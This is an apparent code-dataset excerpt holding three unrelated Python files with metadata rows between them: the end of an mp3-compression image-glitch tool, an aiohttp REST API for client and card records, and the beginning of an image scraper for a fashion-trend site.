        check_cmd = f"{self.lame_bin} --version"
        rc = subprocess.call(check_cmd, shell=True, stdout=DEVNULL)
        if rc == 0:
            self.v("Lame installation detected")
        else:
            self.__die("Lame installation not found, abort")

    def apply_filters(self, filters_all):
        """Apply filters to image one-by-one.

        filters_all -> a dict with filter_id: parameter.
        Unknown keys and falsy values are skipped; filters run in the
        order defined by self.supported_filters.
        """
        self.v(f"Calling apply filters function")
        self.text_position = RANDOM
        if not filters_all:  # no filters: nothing to do
            return
        # keep available filters only + that have value
        filters_ = {k: v for k, v in filters_all.items()
                    if k in self.supported_filters and v}
        # better to keep them ordered
        filters_order = sorted(filters_.keys(), key=lambda x: self.supported_filters.index(x))
        for filt_id in filters_order:
            value = filters_[filt_id]
            self.v(f"Applying filter: {filt_id}, value={value}")
            if filt_id == RB_SHIFT:
                self.__apply_rb_shift(value)
            elif filt_id == GLITTER:
                self.__apply_glitter(value)
            elif filt_id == VERT_STREAKS:
                self.__add_vert_streaks()
            elif filt_id == ADD_RAINBOW:
                self.__add_rainbow()
            elif filt_id == STRETCHING:
                self.__apply_stretching()
            # NOTE(review): ADD_TEXT is listed in supported_filters but has no
            # branch here — text rendering appears to be unimplemented

    def __apply_stretching(self):
        """Apply stretching filter: rescale vertical strips by random factors,
        then squeeze the result back to the original width."""
        h = self.im_arr.shape[0]
        w = self.im_arr.shape[1]
        # split in 10 parts -> redefine this later
        strips_num = 10
        max_kt = 5  # maximal per-strip horizontal scale factor
        strip_w = w // strips_num
        strips = []
        scales = [x for x in max_kt * np.random.sample(strips_num)]
        for j in range(strips_num):
            strip = self.im_arr[:, j * strip_w: (j + 1) * strip_w, :]
            new_shape = (h, int(strip_w * scales[j]))
            strip_res = tf.resize(strip, new_shape)
            strips.append(strip_res)
        concatenation = np.concatenate(strips, axis=1)
        self.im_arr = tf.resize(concatenation, (h, w))

    def __make_bw_(self, thr):
        """Make BW image version: 1.0 where the channel sum exceeds thr."""
        self.v("Producing BW version")
        col_sum = np.sum(self.im_arr, axis=2)  # sum over col channel
        bw_im = np.zeros((col_sum.shape[0], col_sum.shape[1]))
        # fill zero arr with 1 where color sum is > threshold: white
        bw_im[col_sum > thr] = 1
        # at prev step we created 2D arr, need 3D
        bw_im = np.reshape(bw_im, (bw_im.shape[0], bw_im.shape[1], 1))
        # io.imsave("test.jpg", bw_im)
        return np.concatenate((bw_im, bw_im, bw_im), axis=2)

    @staticmethod
    def __rm_bright_zones(img):
        """Remove bright zones: damp pixels whose channel sum exceeds 2."""
        col_sum = np.sum(img, axis=2)
        over_thr = np.reshape((col_sum - 2), (img.shape[0], img.shape[1], 1))
        over_thr = np.concatenate((over_thr, over_thr, over_thr), axis=2)
        new_im = np.where(over_thr > 0, img - over_thr, img)
        # clamp to the valid [0.0, 1.0] float-image range
        new_im[new_im < 0.0] = 0.0
        new_im[new_im > 1.0] = 1.0
        return new_im

    def __rainbow_layer_(self, bw_im):
        """Create a rainbow layer from a black-and-white mask."""
        self.v("Making rainbow layer.")
        # a strong RGB shift on the mask produces the colour fringes
        rainbow_arr = self.__apply_rb_shift(80, non_self_pic=bw_im)
        rainbow_arr = filters.gaussian(rainbow_arr,
                                       sigma=30,
                                       multichannel=True,
                                       mode='reflect',
                                       cval=0.6)
        # boost saturation and brightness in HSV space
        img_hsv = color.rgb2hsv(rainbow_arr)
        img_hsv[..., 1] *= 3  # S
        img_hsv[..., 2] *= 1.4  # V
        img_hsv[img_hsv >= 1.0] = 1.0
        rainbow_arr = color.hsv2rgb(img_hsv)
        rainbow_arr = self.__rm_bright_zones(rainbow_arr)
        # io.imsave("test.jpg", rainbow_arr)
        return rainbow_arr

    def __add_rainbow(self):
        """Add rainbow to the image (overlaid on its bright areas)."""
        self.v("Adding a rainbow")
        # detect bright parts
        bw_version = self.__make_bw_(thr=2.1)
        rainbow_pic = self.__rainbow_layer_(bw_version)
        rainbow_pic /= 2  # half-strength overlay
        self.im_arr = rainbow_pic + self.im_arr
        self.im_arr[self.im_arr > 1.0] = 1.0

    def __add_vert_streaks(self):
        """Add vertical streaks: roll the columns of every other stripe."""
        # NOTE(review): the names suggest width/height, but these are simply
        # shape[0]/shape[1]; stripes are cut along axis 1
        w, h, d = self.im_arr.shape
        processed = []
        streaks_borders_num = random.choice(range(8, 16, 2))
        streaks_borders = [0] + list(sorted(np.random.choice(range(h),
                                                             streaks_borders_num,
                                                             replace=False))) + [h]
        for num, border in enumerate(streaks_borders[1:]):
            prev_border = streaks_borders[num]
            pic_piece = self.im_arr[:, prev_border: border, :]
            if num % 2 != 0:  # don't touch this part
                processed.append(pic_piece)
                continue
            piece_h, piece_w, _ = pic_piece.shape
            piece_rearranged = []
            # per-column vertical shifts: |N(5, 10)| sorted, plus small jitter;
            # left half ascending, right half descending
            shifts_raw = sorted([x if x > 0 else -x for x in
                                 map(int, np.random.normal(5, 10, piece_w))])
            shifts_add = np.random.choice(range(-5, 2), piece_w)
            shifts_mod = [shifts_raw[x] + shifts_add[x] for x in range(piece_w)]
            shifts_left = [shifts_mod[x] for x in range(0, piece_w, 2)]
            shifts_right = sorted([shifts_mod[x] for x in range(1, piece_w, 2)],
                                  reverse=True)
            shifts = shifts_left + shifts_right
            for col_num, col_ind in enumerate(range(piece_w)):
                col = pic_piece[:, col_ind: col_ind + 1, :]
                col = np.roll(col, axis=0, shift=shifts[col_num])
                piece_rearranged.append(col)
            piece_shifted = np.concatenate(piece_rearranged, axis=1)
            processed.append(piece_shifted)
        # merge shifted elements back
        self.im_arr = np.concatenate(processed, axis=1)
        self.im_arr = tf.resize(self.im_arr, (w, h))

    def __apply_glitter(self, value):
        """Apply glitter: draw `value` small white sparks at random spots."""
        dots = []  # fill this list with dot coordinates
        _dot_size = 3
        w, h, _ = self.im_arr.shape
        for _ in range(value):
            # just randomly select some coordinates
            dx = random.choice(range(_dot_size, w - _dot_size))
            dy = random.choice(range(_dot_size, h - _dot_size))
            dots.append((dx, dy))
        for dot in dots:
            # 1px-high, 6px-wide white dash at each coordinate
            self.im_arr[dot[0] - 1: dot[0], dot[1] - 3: dot[1] + 3, :] = 1

    def shift_hue(self, value):
        """Shift image hue in HSV.

        NOTE(review): adds `value` then subtracts 1 — appears to assume
        0 < value <= 1 so the hue stays in range; confirm with callers.
        """
        img_hsv = color.rgb2hsv(self.im_arr)
        img_hsv[..., 0] += value
        img_hsv[..., 0] -= 1
        self.im_arr = color.hsv2rgb(img_hsv)

    def __apply_rb_shift(self, value, non_self_pic=None):
        """Draw chromatic aberrations.

        value: shift in px (green is shrunk by `value`, blue by 2*value).
        non_self_pic: optional image to process instead of self.im_arr;
        when given, the result is returned instead of being stored.
        """
        if non_self_pic is None:
            _init_shape = self.im_arr.shape
            proc_pic = self.im_arr
        else:  # apply this filter to something else:
            self.v("Applying RGB shift to non-self.im_arr picture!")
            _init_shape = non_self_pic.shape
            proc_pic = non_self_pic
        # extract different channels
        red = proc_pic[:, :, 0]
        green = proc_pic[:, :, 1]
        blue = proc_pic[:, :, 2]
        # resize different channels to create the effect
        # define new sizes
        red_x, red_y = _init_shape[0], _init_shape[1]
        self.v(f"Red channel size: {red_x}x{red_y}")
        green_x, green_y = _init_shape[0] - value, _init_shape[1] - value
        self.v(f"Green channel size: {green_x}x{green_y}")
        blue_x, blue_y = _init_shape[0] - 2 * value, _init_shape[1] - 2 * value
        self.v(f"Blue channel size: {blue_x}x{blue_y}")
        # check that sizes are OK
        channel_borders = (red_x, red_y, green_x, green_y, blue_x, blue_y)
        if any(x < 1 for x in channel_borders):
            self.__die(f"{RB_SHIFT} got too bit value {value}; cannot apply")
        # apply resize procedure
        red = tf.resize(red, output_shape=(red_x, red_y))
        green = tf.resize(green, output_shape=(green_x, green_y))
        blue = tf.resize(blue, output_shape=(blue_x, blue_y))
        w, h = blue.shape  # temporary shape (minimal channel size)
        self.v(f"Updated image size: {w}x{h}")
        ktd2 = int(value / 2)
        # crop each channel to the common (blue) size, re-centering them
        red_n = np.reshape(red[value: -value, value: -value],
                           (w, h, 1))
        green_n = np.reshape(green[ktd2: -1 * ktd2, ktd2: -1 * ktd2],
                             (w, h, 1))
        blue_n = np.reshape(blue[:, :], (w, h, 1))
        # save changes to self.im_arr
        if non_self_pic is None:
            self.im_arr = np.concatenate((red_n, green_n, blue_n), axis=2)
            # reshape it back
            self.im_arr = tf.resize(self.im_arr, (_init_shape[0], _init_shape[1]))
            self.v(f"Successfully applied {RB_SHIFT} filter")
            return None
        else:
            # return image (not self.im_arr)
            upd_img = np.concatenate((red_n, green_n, blue_n), axis=2)
            upd_img = tf.resize(upd_img, (_init_shape[0], _init_shape[1]))
            self.v("Applied RGB shift to non-self.im_arr image")
            return upd_img

    def __parse_mp3_attrs(self, attrs):
        """Parse mp3-related options; merge user values over the defaults."""
        self.v("Defining mp3-compression parameters")
        attrs_dict = {ADD_NOISE: False,
                      SOUND_QUALITY: 8,
                      BITRATE: 16,
                      INTENSIFY: False,
                      GLITCH_SOUND: False,
                      SHIFT_SIZE: int(self.im_arr.shape[1] / 2.35)
                      }
        # correct shift size if bitrate is pretty high
        if attrs_dict[BITRATE] >= 64:
            attrs_dict[SHIFT_SIZE] = 0
        avail_keys = set(attrs_dict.keys())
        # re-define default params
        for k, v in attrs.items():
            if k not in avail_keys:
                continue
            if v is None:
                continue
            self.v(f"Set param {k} to {v}")
            attrs_dict[k] = v
        # sanity checks
        if attrs_dict[SOUND_QUALITY] < 1 or attrs_dict[SOUND_QUALITY] > 10:
            self.__die(f"Sound quality must be in [1..10]")
        return attrs_dict

    def __add_noise(self):
        """Add noise to image (intensifies the effect)."""
        self.im_arr = util.random_noise(self.im_arr, mode="speckle")

    def mp3_compression(self, attrs):
        """Compress and decompress the image using mp3 algorithm.

        attrs -> a dictionary with additional parameters.
        Each colour channel is dumped as raw bytes, pushed through a lame
        encode/decode round-trip, and read back as the glitched channel.
        """
        # split image in channels
        orig_image_ = self.im_arr.copy()
        self.v("Applying mp3 compression")
        mp3_attrs = self.__parse_mp3_attrs(attrs)
        self.__add_noise() if mp3_attrs[ADD_NOISE] else None
        # apply gamma correction upfront
        self.im_arr = exposure.adjust_gamma(image=self.im_arr, gain=self.gamma)
        w, h, _ = self.im_arr.shape
        # after the mp3 compression the picture shifts, need to compensate that
        # however, if bitrate >= 64 it doesn't actually happen
        red = self.im_arr[:, :, 0]
        green = self.im_arr[:, :, 1]
        blue = self.im_arr[:, :, 2]
        channels = (red, green, blue)
        glitched_channels = []
        # process them separately
        for num, channel in enumerate(channels, 1):
            # need 1D array now
            orig_size = w * h
            channel_flat = np.reshape(channel, newshape=(orig_size, ))
            int_form_nd = np.around(channel_flat * 255, decimals=0)
            int_form_nd[int_form_nd > 255] = 255
            int_form_nd[int_form_nd < 0] = 0
            # convert to bytes
            int_form = list(map(int, int_form_nd))
            bytes_str = bytes(int_form)
            # define temp file paths
            raw_chan_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.blob")
            mp3_compr_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.mp3")
            mp3_decompr_ = os.path.join(self.tmp_dir, f"{self.__id_gen()}.mp3")
            # save paths (to remove the files later)
            self.temp_files.extend([raw_chan_, mp3_compr_, mp3_decompr_])
            # save bytes so a pseudo-wav file
            self.v(f"Bytes size before compression: {orig_size}")
            with open(raw_chan_, "wb") as f:
                f.write(bytes_str)
            # define compress-decompress commands
            mp3_compr_cmd = f'{self.lame_bin} -r --unsigned -s 16 -q {mp3_attrs[SOUND_QUALITY]} ' \
                            f'--resample 16 --bitwidth 8 -b {mp3_attrs[BITRATE]} ' \
                            f'-m m {raw_chan_} "{mp3_compr_}"'
            mp3_decompr_cmd = f'{self.lame_bin} --decode -x -t "{mp3_compr_}" {mp3_decompr_}'
            # call compress-decompress commands
            self.__call_proc(mp3_compr_cmd)
            # if required: change mp3 stream itself
            self.__glitch_sound(mp3_compr_, num, mp3_attrs) if mp3_attrs[GLITCH_SOUND] else None
            self.__call_proc(mp3_decompr_cmd)
            # read decompressed file | get raw sequence
            with open(mp3_decompr_, "rb") as f:
                mp3_bytes = f.read()
            upd_size = len(mp3_bytes)
            self.v(f"Bytes size after compression: {upd_size}")
            # usually array size after compression is bigger
            proportion = upd_size // orig_size
            # split in chunks of proportion size, take the 1st element from each
            bytes_num = len(bytes_str) * proportion
            decompressed = mp3_bytes[:bytes_num]
            glitched_channel = np.array([pair[0] / 255 for pair
                                         in self.parts(decompressed, proportion)])
            glitched_channel = np.reshape(glitched_channel, newshape=(w, h, 1))
            glitched_channels.append(glitched_channel)
        self.v("Concatenation of the mp3d image + rolling + adjust contrast")
        self.im_arr = np.concatenate(glitched_channels, axis=2)
        self.im_arr = np.roll(a=self.im_arr, axis=1, shift=mp3_attrs[SHIFT_SIZE])
        # stretch contrast between the 5th and 95th percentiles
        perc_left, perc_right = np.percentile(self.im_arr, (5, 95))
        self.im_arr = exposure.rescale_intensity(self.im_arr, in_range=(perc_left, perc_right))
        self.__remove_temp_files()  # don't need them anymore
        self.__intensify(orig_image_) if mp3_attrs[INTENSIFY] else None

    def __glitch_sound(self, mp3_path, ch_num, opts):
        """Change mp3 file directly.

        Currently a scaffold: the sample array is read and written back
        unchanged (the processing step is still a placeholder).
        """
        self.v(f"Changing sound stream in {mp3_path} directly")
        if AudioSegment is None:
            self.__die("__glitch_sound requires Audiosegment (not imported)")
        x, y, _ = self.im_arr.shape
        # read sound file, get array of bytes (not a list!)
        sound = AudioSegment.from_mp3(mp3_path)
        # NOTE(review): last_ind is currently unused
        last_ind = x * y  # sound array is a bit longer than image size
        entire_sound_array = np.array(sound.get_array_of_samples())
        # some processing here
        # final step: convert np array back to array
        new_array = array("h", entire_sound_array)
        new_sound = sound._spawn(new_array)
        new_sound.export(mp3_path, format='mp3')

    def __intensify(self, orig_image):
        """Intensify mp3 glitch using differences with original image."""
        self.v("Increasing mp3 glitch intensity")
        diff = self.im_arr - orig_image
        diff[diff < 0] = 0
        # amplify the diff's saturation/brightness, then add it back
        diff_hsv = color.rgb2hsv(diff)
        diff_hsv[..., 1] *= 5
        diff_hsv[..., 2] *= 2.5
        diff_hsv[diff_hsv >= 1.0] = 1.0
        diff = color.hsv2rgb(diff_hsv)
        self.im_arr += diff
        self.im_arr[self.im_arr > 1.0] = 1.0

    def __call_proc(self, command):
        """Call command using subprocess; abort on a non-zero exit code."""
        self.v(f"Calling command: {command}")
        rc = subprocess.call(command, shell=True, stderr=DEVNULL)
        if rc != 0:
            self.__die(f"Error! Command {command} died!")

    def __remove_temp_files(self):
        """Remove temp files listed in the self.temp_files."""
        self.v(f"Removing temp files: {self.temp_files}")
        for tmp_file in self.temp_files:
            os.remove(tmp_file) if os.path.isfile(tmp_file) else None

    def save(self, path_):
        """Save the resulting image."""
        self.v(f"Saving image to: {path_}")
        io.imsave(fname=path_, arr=img_as_ubyte(self.im_arr))

    def v(self, msg):
        """Show verbose message (stderr, only when verbose mode is on)."""
        sys.stderr.write(f"{msg}\n") if self.verbose else None

    @staticmethod
    def __die(message, rc=1):
        """Write message and quit."""
        sys.stderr.write("Error!\n")
        sys.stderr.write(f"{message}\n")
        sys.exit(rc)

    @staticmethod
    def __id_gen(size=12, chars=string.ascii_uppercase + string.digits):
        """Return random string for temp files."""
        return "".join(random.choice(chars) for _ in range(size))

    @staticmethod
    def parts(lst, n):
        """Split an iterable into a list of lists of len n."""
        return [lst[x: x + n] for x in iter(range(0, len(lst), n))]
def parse_args():
    """Parse cmd args.

    Prints help and exits when fewer than two positional args are given.
    Returns the parsed argparse namespace.
    """
    app = argparse.ArgumentParser()
    app.add_argument("input", help="Input image")
    app.add_argument("output", help="Output image")
    app.add_argument("--size", default=1000, type=int, help="Image size (long side)")
    # short form is --v1 because -v is taken by --vert_streaks below
    app.add_argument("--verbose", "--v1", action="store_true", dest="verbose",
                     help="Verbosity mode on.")
    # filters
    app.add_argument(f"--{RB_SHIFT}", "-r", default=0, type=int,
                     help="RGB aberrations, the bigger value -> the higher intensity")
    app.add_argument(f"--{GLITTER}", "-g", default=0, type=int,
                     help="Add glitter, The bigger value -> the bigger sparks")
    app.add_argument(f"--{VERT_STREAKS}", "-v", action="store_true", dest=VERT_STREAKS,
                     help="Add vertical streaks")
    app.add_argument(f"--{ADD_TEXT}", "-t", default=None,
                     help="Add text (position is random)")
    app.add_argument("--text_position", "--tp", type=str,
                     help="Pre-define text coordinates (left corner) "
                          "two comma-separated values like 100,50")
    app.add_argument(f"--{ADD_RAINBOW}", "-a", dest=ADD_RAINBOW, action="store_true",
                     help="Add a rainbow!")
    # mp3-compression params
    app.add_argument(f"--compression_cycles", "--cc", default=1, type=int,
                     help="Number of mp3 compression-decompression cycles, default 1")
    app.add_argument("--save_each_cycle", "--sec", default=None,
                     help="Save an image of each compression cycle, specify "
                          "a directory if this is a case")
    app.add_argument(f"--{STRETCHING}", "--st", action="store_true", dest=STRETCHING,
                     help="Apply stretching filter")
    app.add_argument(f"--{ADD_NOISE}", "-n", action="store_true", dest=ADD_NOISE,
                     help="Add random noise to increase glitch effect")
    app.add_argument(f"--{SOUND_QUALITY}", "-q", type=int, default=8,
                     help="Gleitzsch sound quality")
    app.add_argument(f"--{BITRATE}", "-b", type=int, default=16,
                     help="MP3 bitrate")
    app.add_argument(f"--{INTENSIFY}", "-i", action="store_true", dest=INTENSIFY,
                     help="Get diff between mp3 glitched/not glitched image and "
                          "intensify glitched channel")
    app.add_argument(f"--{GLITCH_SOUND}", "-s", action="store_true", dest=GLITCH_SOUND,
                     help="Modify intermediate mp3 files")
    app.add_argument(f"--{SHIFT_SIZE}", "--sz", default=None, type=int,
                     help="Mp3 compression produces a horizontally shifted image "
                          "This parameter controls shift size, overriding "
                          "automatically assigned values")
    # no input/output given -> show usage instead of an argparse error
    if len(sys.argv) < 3:
        app.print_help()
        sys.exit(0)
    args_ = app.parse_args()
    return args_
if __name__ == "__main__":
    args = parse_args()
    gleitzsch = Gleitzsch(args.input, args.size, args.verbose)
    gleitzsch.apply_filters(vars(args))  # as a dict: filter id -> value
    # BUGFIX: create the per-cycle output directory whenever it is requested;
    # previously it was only created for compression_cycles > 1, so a single
    # cycle with --save_each_cycle pointing to a missing dir crashed on save
    if args.save_each_cycle and not os.path.isdir(args.save_each_cycle):
        os.mkdir(args.save_each_cycle)
    for i in range(args.compression_cycles):
        if args.compression_cycles > 1:
            sys.stderr.write(f"Compression cycle num {i + 1}/{args.compression_cycles}\n")
        gleitzsch.mp3_compression(vars(args))
        if args.save_each_cycle:
            filename = f"{str(i).zfill(4)}.jpg"
            path = os.path.join(args.save_each_cycle, filename)
            gleitzsch.save(path)
    gleitzsch.save(args.output)
{
"api_name": "sys.stderr.write",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "sys.stderr.write",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sys.stderr",
"l... |
38054510986 | import accept
import logging
from aiohttp import web, web_exceptions
from aiohttp_swagger import setup_swagger
from model import ClientModel, ItemNotFoundException
from protocol import *
from prometheus_client import REGISTRY, exposition
from urllib.parse import parse_qs
from voluptuous import MultipleInvalid
class Api:
    """HTTP API for the card/client service (aiohttp + aiohttp_swagger).

    The YAML docstrings on the handlers are consumed at runtime by
    setup_swagger() to render the API docs, so they are kept verbatim.
    """

    # content type served when the client accepts anything (*/*)
    DEFAULT_CONTENT_TYPE = "application/json"
    logger = logging.getLogger(__name__)
    registry = REGISTRY  # prometheus registry scraped by /metrics
    # response encoders keyed by Accept media type
    __encoders = {
        "application/xml": XMLEncoder(),
        "application/json": JsonEncoder()
    }

    def __init__(self, host, port, transactor):
        # `transactor` is handed to the model layer untouched
        self.__app = web.Application()
        self.__host = host
        self.__port = port
        self.__app.add_routes([
            web.get('/', self.health),
            web.get('/metrics', self.metrics),
            web.get('/v1/cards', self.card_list),
            web.post('/v1/cards', self.add_card),
            web.get('/v1/clients', self.client_list),
            web.post('/v1/clients', self.add_client),
            web.get(r'/v1/clients/{id:\d+}/balance', self.client_balance),
            web.put(r'/v1/cards/{id:\d+}', self.change_card)
        ])
        self.__client_model = ClientModel(transactor)

    def __paginate(self, request):
        # Extract (offset, limit) from the query string; 400 on repeated
        # parameters. Defaults: offset=0, limit=20.
        qs = parse_qs(request.query_string)
        offsets = qs.get('offset', [0])
        if len(offsets) > 1:
            raise web_exceptions.HTTPBadRequest(text='Invalid offset value')
        limits = qs.get('limit', [20])
        if len(limits) > 1:
            raise web_exceptions.HTTPBadRequest(text='Invalid limit value')
        return int(offsets[0]), int(limits[0])

    def __choose_encoder(self, request):
        # Pick a response encoder matching the Accept header; 406 when no
        # supported media type is accepted.
        for accept_header in accept.parse(request.headers.get('Accept')):
            if accept_header.media_type == '*/*':
                return self.__encoders.get(self.DEFAULT_CONTENT_TYPE)
            encoder = self.__encoders.get(accept_header.media_type)
            if encoder is not None:
                return encoder
        raise web_exceptions.HTTPNotAcceptable()

    async def __decode_post(self, request):
        # Decode the request body according to Content-Type; 400 otherwise.
        if request.content_type == "application/json":
            return await request.json()
        if request.content_type == "application/xml":
            # NOTE(review): XML decoding is a stub — returns a placeholder dict
            return {"data": "xml"}
        raise web_exceptions.HTTPBadRequest(
            text="Unknown Content-Type header. Only application/json, application/xml are allowed."
        )

    async def start(self):
        # Mount the swagger UI and start serving on the configured host/port.
        setup_swagger(self.__app, swagger_url='/v1/docs')
        runner = web.AppRunner(self.__app)
        await runner.setup()
        service = web.TCPSite(runner, self.__host, self.__port)
        await service.start()
        self.logger.info('Service is started at %s:%s', self.__host, self.__port)

    async def health(self, _):
        """
        ---
        description: Запрос для проверки успешного запуска сервиса.
        tags:
        - Health check
        produces:
        - text/plain
        responses:
            "200":
                description: успех. Возвращает информацию о сервисе
        """
        return web.Response(text="Ok")

    async def metrics(self, request):
        """
        ---
        description: Запрос для получения метрик сервиса
        tags:
        - Metrics
        produces:
        - text/plain
        responses:
            "200":
                description: успех. Возвращает метрики
        """
        # prometheus_client picks the wire format from the Accept header
        encoder, content_type = exposition.choose_encoder(request.headers.get('Accept'))
        scrape = encoder(self.registry)
        return web.Response(headers=dict([('Content-Type', content_type)]), body=scrape)

    async def card_list(self, request):
        """
        ---
        description: Запрос для получения списка карт клиентов
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: offset
          in: query
          description: Pagination offset
          required: false
          type: integer
        - name: limit
          in: query
          description: Pagination limit
          required: false
          type: integer
        responses:
            "200":
                description: успех. Возвращает список карт клиентов
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        offset, limit = self.__paginate(request)
        cards, count = await self.__client_model.all_cards(offset, limit)
        # X-Total carries the unpaginated row count
        return web.Response(content_type=encoder.content_type, body=encoder.encode(cards), headers={"X-Total": str(count)})

    async def add_card(self, request):
        """
        ---
        description: Запрос для добавления новой карты клиента
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: card
          in: body
          description: данные новой карты
          required: true
          schema:
            type: object
            properties:
              owner_id:
                type: integer
                description: идентификатор владельца карты
                required: true
              payment_system:
                type: string
                description: платежная система
                required: true
              currency:
                type: string
                description: валюта карты
                required: true
              balance:
                type: numeric
                description: баланс карты
                required: true
        responses:
            "200":
                description: успех. Возвращает данные новой карты клиента
            "404":
                description: ошибка. Клиент не найден
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            card = await self.__client_model.add_card(data)
            return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(card))
        except MultipleInvalid as e:
            # schema validation failure -> 400
            raise web_exceptions.HTTPBadRequest(text=str(e))
        except ItemNotFoundException as e:
            # unknown owner_id -> 404
            raise web_exceptions.HTTPNotFound(text=str(e))

    async def client_list(self, request):
        """
        ---
        description: Запрос для получения списка клиентов
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: offset
          in: query
          description: Pagination offset
          required: false
          type: integer
        - name: limit
          in: query
          description: Pagination limit
          required: false
          type: integer
        responses:
            "200":
                description: успех. Возвращает список клиентов
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        offset, limit = self.__paginate(request)
        clients, count = await self.__client_model.all_clients(offset, limit)
        return web.Response(content_type=encoder.content_type, body=encoder.encode(clients), headers={"X-Total": str(count)})

    async def add_client(self, request):
        """
        ---
        description: Запрос для добавления нового клиента
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: card
          in: body
          description: данные нового клиента
          required: true
          schema:
            type: object
            properties:
              name:
                type: string
                description: имя клиента
        responses:
            "200":
                description: успех. Возвращает данные нового клиента
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            client = await self.__client_model.add_client(data)
            return web.HTTPCreated(content_type=encoder.content_type, body=encoder.encode(client))
        except MultipleInvalid as e:
            raise web_exceptions.HTTPBadRequest(text=str(e))

    async def client_balance(self, request):
        """
        ---
        description: Запрос для получения баланса клиента
        tags:
        - Clients
        produces:
        - application/json
        - application/xml
        parameters:
        - name: id
          in: path
          description: идентификатор клиента
          required: false
          type: integer
        responses:
            "200":
                description: успех. Возвращает данные нового клиента
            "404":
                description: ошибка. Клиент не найден
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        client_id = int(request.match_info.get('id'))
        encoder = self.__choose_encoder(request)
        # NOTE(review): the docs promise a 404, but ItemNotFoundException is
        # not caught here — an unknown id would surface as a 500; confirm
        client = await self.__client_model.client_balance(client_id)
        return web.Response(content_type=encoder.content_type, body=encoder.encode(client))

    async def change_card(self, request):
        """
        ---
        description: Запрос для изменение данных по карте
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: id
          in: path
          description: идентификатор карты
          required: true
          type: integer
        - name: card
          in: body
          description: данные карты
          required: true
          schema:
            type: object
            properties:
              owner_id:
                type: integer
                description: идентификатор владельца карты
              payment_system:
                type: string
                description: платежная система
              currency:
                type: string
                description: валюта карты
              balance:
                type: float
                description: баланс карты
        responses:
            "200":
                description: успех. Возвращает измененные данные карты
            "400":
                description: ошибка клиента. Указаны неверные данные карты
            "404":
                description: ошибка. Карта не найдена
            "406":
                description: ошибка клиента. Указан неверный Accept
        """
        card_id = int(request.match_info.get('id'))
        encoder = self.__choose_encoder(request)
        data = await self.__decode_post(request)
        try:
            card = await self.__client_model.change_card(card_id, data)
            return web.Response(content_type=encoder.content_type, body=encoder.encode(card))
        except MultipleInvalid as e:
            # NOTE(review): documented 404 (card not found) is not handled
            # here either — only validation errors map to 400; confirm
            raise web_exceptions.HTTPBadRequest(text=str(e))
| weierstrass54/sb_rest | api.py | api.py | py | 12,166 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "prometheus_client.REGISTRY",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "aiohttp.web.Application",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "... |
625331659 | import os
import time
from io import BytesIO
import aiohttp
import asyncio
import requests
from PIL import Image
from lxml import etree
# import pandas as pd
class Spider(object):
    """Image crawler for apps.wow-trend.com.

    The download path is chosen at construction time, e.g. r'd:\test\\'
    (the directory must already exist).  A file-name prefix can be added by
    appending it to the path, e.g. r'd:\test\abc' makes every generated
    file start with "abc".  With no argument, a "downpic" directory under
    the current working directory is used (created automatically).
    """

    def __init__(self, down_path=''):
        # Browser-like UA so the listing API does not reject the requests.
        self.headers = {
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'
        }
        # Running counter of saved images; also the fallback file name.
        self.num = 0
        if down_path == "":
            if 'downpic' not in os.listdir('.'):  # "downpic" under the current dir
                os.mkdir('downpic')
            self.path = os.path.join(os.path.abspath('.'), 'downpic')
            os.chdir(self.path)  # enter the download directory
        self.down_path = down_path
        self.url = 'https://apps.wow-trend.com/api/trend/picture/get-list'
        self.params = {'nav_id': '35', 'gender_id': '72105', 'size': '60', 'page': '1', 'attrs': '[]'}

    def get_img_links(self, page, get_total_page=False):
        """Fetch the picture list for *page*.

        With get_total_page=True, return the total page count instead of
        the list of picture records.
        """
        self.params['page'] = str(page)
        print('正在爬取页数:', page)
        r = requests.get(url=self.url, headers=self.headers, params=self.params)
        result = r.json()
        if get_total_page:
            return result['data']['totalPage']
        urls_info = result['data']['list']
        print('本页{}张图片'.format(len(urls_info)))
        return urls_info

    async def get_sub_img_links(self, url):
        """Open a picture detail page and download its full-size image,
        prefixing the file name with author name and code.

        NOTE(review): this calls self.__download_img, which is not defined
        anywhere in the class (only commented out) — calling this method
        would raise AttributeError.  It is currently dead code; run() uses
        _get_content instead.
        """
        async with aiohttp.ClientSession(headers=self.headers) as session:
            r = await session.get(url)
            rtext = await r.text()
            el = etree.HTML(rtext)
            # Author name and code scraped from the detail page.
            author_path = '//*[@id="__next"]/div/main/div[1]/div/div[3]/div[1]/div[1]/span[2]/a'
            author = el.xpath(author_path)[0]
            author_name = author.xpath('./text()')[0]
            author_code = author.xpath('./@href')[0].split('/')[-1]
            author_info = f'{author_name}_{author_code}'
            pic_xpath = '//*[@id="__next"]/div/main/div[1]/div/div[2]/div/div[1]/figure/img/@data-src'
            await self.__download_img(el.xpath(pic_xpath)[0], crop=True, prefix=author_info)

    def _write_img(self, file_name, content):
        """Persist one downloaded image twice: a thumbnail under '略缩图'
        and a cropped square copy under '裁剪图'."""
        file_name_resize = os.path.join(self.down_path, '略缩图', file_name)
